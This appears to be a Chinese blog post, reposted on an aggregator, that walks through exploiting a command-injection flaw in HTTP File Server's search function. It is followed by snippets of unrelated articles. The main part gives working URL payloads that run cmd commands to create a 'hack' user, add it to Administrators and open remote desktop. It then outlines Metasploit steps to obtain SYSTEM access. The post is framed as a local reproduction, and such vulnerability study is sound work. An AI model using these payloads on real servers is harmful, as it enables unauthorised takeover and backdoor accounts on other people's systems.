漏洞程序下载地址:Http File Server
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。
运行程序截图如下
尝试访问该软件提供的web服务
web服务是这个样子的,这个web服务的搜索处存在漏洞
一、手工利用
payload如下
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
- 1
- 2
完整利用过程如下
使用如下payload添加一个管理员账户
http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}
- 1
添加用户:hack
密码:123
将用户hack添加到Administrators组。
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}
- 1
开启3389远程端口
使用远程连接工具连接,连接成功。
2、使用msf利用
启动Metasploit,搜索hfs漏洞利用模块
加载模块,并设置目标IP
设置payload,以及本机IP
开始执行
成功获得system权限
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358782.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!相关文章
Silverlight 中datagrid控件-- 通过设置数据虚拟化加速显示
定义依赖属性作为datagrid的数据源 protected static readonly DependencyProperty ViewLogsProperty DependencyProperty.Register("ViewLogs", typeof(ObservableCollection<RMSReportEvent>), typeof(LogViewer), new PropertyMetadata(null)); protected …
java解析java源码_JAVA语言-Java源码解析-Stack源码分析
一、简介stack类图.png栈是数据结构中一种很重要的数据结构类型,因为栈的后进先出功能是实际的开发中有很多的应用场景。Java API中提供了栈(Stacck)的实现。Stack类继承了Vector类,而Vector类继承了AbstractList抽象类,实现了List类…
的使用)
渗透测试神器CS(4.0)的使用
CS CS简介CS功能安装CSCS的基本使用深入标题介绍 Beacon Commands基础操作演示 CS简介 CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端&…
UTF-8和GBK有啥区别?
粉丝求助: 如何解决:
把编辑器和浏览器的字符集统一设置成utf-8或者gbk即可。 主要区别: 1.GBK是在bai国家标准GB2312基础上扩容后兼容GB2312的标准(好像还不du是国家标准)。zhiGBK编码dao专门用来解决中文编码的,是双字节的。不论中英文都是双字节的。 2. UTF-8 编码是…
服务osgi_OSGi –具有服务的简单Hello World
服务osgi在本文中,我们将使用OSGi开发一个简单的Hello World应用程序。 我们将使用Felix作为OSGi容器 。 在下一篇文章中,我们将继续使用该应用程序,并使用Spring Dynamic Modules对其进行改进。 为了使开发有趣,我们将创建两个捆…
)
Java反射(Reflection)
基本概念 在Java运行时环境中,对于任意一个类,能否知道这个类有哪些属性和方法?对于任意一个对象,能否调用它的任意一个方法? 答案是肯定的。 这种动态获取类的信息以及动态调用对象的方法的功能来自于Java语言的反射&…
超详细的MySQL三万字总结
文章目录 MySQL基础数据库的介绍数据库概述数据的存储方式数据库的概念常见数据库排行榜 数据库的安装与卸载数据库的安装数据库的卸载 数据库服务的启动与登录Windows 服务方式启动DOS 命令方式启动控制台连接数据库SQLyog 图形化工具——客户端使用 SQLyog 登录数据库数据库…
map转字符串数组中 php_js将map转换成数组
linux中oops信息的调试及栈回溯【转】本文转载自:http://blog.csdn.net/kangear/article/details/8217329 ...linux 2.6 驱动笔记(一)本文作为linux 2.6 驱动笔记,记录环境搭建及linux基本内核模块编译加载. 环境搭建: 硬件:OK6410开发板 目标板操作系统:linux 2.6…
你要的能做出炫酷图表的网站来啦
不需要多高深的技术,也不需要多长时间,分分钟让小白都能做出超好看的图表~
1.DataV
DataV 是阿里云出品的在线可视化工具,可以将超多数据,放在一块大屏上 2.网易有数
网易有数的特点是,编辑页面自由度非常高&#x…
ecshop获取客户端操作系统
<?php
/*** 获得客户端的操作系统** access private* return void*/
function get_os()
{if (empty($_SERVER[HTTP_USER_AGENT])){return Unknown;}$agent strtolower($_SERVER[HTTP_USER_AGENT]);$os ;if (strpos($agent, win) ! false){if (strpos($agent, nt 5.1…
...)
求有向图中两点最短距离java_算法题解:求有向图中的最短路径(JAVA+DFS算法实现)...
求有向图中的最短路径(JAVADFS算法实现)问题描述给定一个有向图,如下图所示,求从1号顶点到5号顶点的最短路径。输入数据格式为第一行输入顶点数和边数,从第二行开始每一行输入3个整数,分别代表连接顶点的边和权重。例如࿱…
30个Java入门技巧和最佳实践
Java是最流行的编程语言之一-无论是Win应用程序,Web应用程序,移动,网络,消费电子产品,机顶盒设备,Java随处可见。 在Java上运行的设备超过30亿。 据甲骨文称 ,正在使用50亿张Java卡。 超过900…
Postman使用详解
一、Postman背景介绍
用户在开发或者调试网络程序或者是网页B/S模式的程序的时候是需要一些方法来跟踪网页请求的,用户可以使用一些网络的监视工具比如著名的Firebug等网页调试工具。今天给大家介绍的这款网页调试工具不仅可以调试简单的css、html、脚本等简单的网…
java double精确比较,Java float比double更精确?
Code:class Main {public static void main (String[] args) {System.out.print("float: ");System.out.println(1.35f-0.00026f);System.out.print("double: ");System.out.println(1.35-0.00026);}}Output:float: 1.34974double: 1.3497400000000002??…
《Bash 脚本教程》免费发布啦,开源!
一共写了 20 节,Bash 脚本编程的主要语法,都包括在内了,日常使用应该足够。也欢迎初学者使用这个教程,学习 Bash。
这个教程是开源的,你可以克隆它的代码仓库,放在本地,也可以提交 issue 和 pu…
浅介 (转载))
linux脚本编程(shell)浅介 (转载)
linux脚本(shell)编程 啊,昨天上网看到一篇讲 linux/unix shell 的文章,想想自己最后写这东西也是一年前的事了,想想都快忘光了。 还是整理一下,做一次回顾,以后说不定还用得上;帖出来,方便第一…
)
postman插件下载安装教程(详细)
一、前言 postman是一款强大网页接口调试工具,我们在平时开发过程中经常会使用到,一般使用最多的是postman的客户端,实际上postman在谷歌浏览器上也提供了插件,可以不必要安装客户端进行接口测试工作。 建议更新到最新谷歌浏览器&…
java显示星期几_Java 使用日历显示星期几
import java.util.Calendar;/*nowjava.com 提 供*/public class Main {public static void main(String[] args) {//create Calendar instanceCalendar now Calendar.getInstance();System.out.println("Current date : " (now.get(Calendar.MONTH) 1) "-&qu…